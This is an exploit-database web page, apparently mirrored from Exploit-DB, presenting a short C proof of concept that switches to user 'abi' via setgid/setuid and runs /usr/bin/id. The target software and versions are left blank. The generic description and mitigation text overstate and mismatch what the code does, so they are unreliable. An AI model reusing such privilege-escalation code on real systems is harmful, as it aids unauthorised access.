header-logo
Suggest Exploit
vendor:
by:
7.5
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Privilege Escalation via setgid and setuid functions

This exploit leverages the setgid and setuid functions to escalate privileges. The program first retrieves the user 'abi' from the system's password file using getpwnam. Then, it sets the group ID and user ID to that of the 'abi' user. Finally, it executes the '/usr/bin/id' command using the popen function and prints the output. This allows an attacker to execute commands with elevated privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and avoid using setgid and setuid functions without proper access control. Additionally, it is important to regularly update and patch the system to address any potential vulnerabilities.
Source

Exploit-DB raw data:

#include <sys/types.h>
#include <unistd.h>
#include <pwd.h>
#include <stdio.h>

int main() 
{
     struct passwd *pw;
     pw = getpwnam("abi");
     FILE *pipe;
     char buf[25];
     setgid(pw->pw_gid);
     setuid(pw->pw_uid);

     printf("my gid: %d\n", getegid());
     printf("my uid: %d\n", getuid());

     pipe = popen("/usr/bin/id", "r");
     while (fgets(buf, sizeof buf, pipe)) {
             printf("%s", buf);
     }
     printf("\n");
     pclose(pipe);
}

Navigation

Suggest Exploit

Services By CQR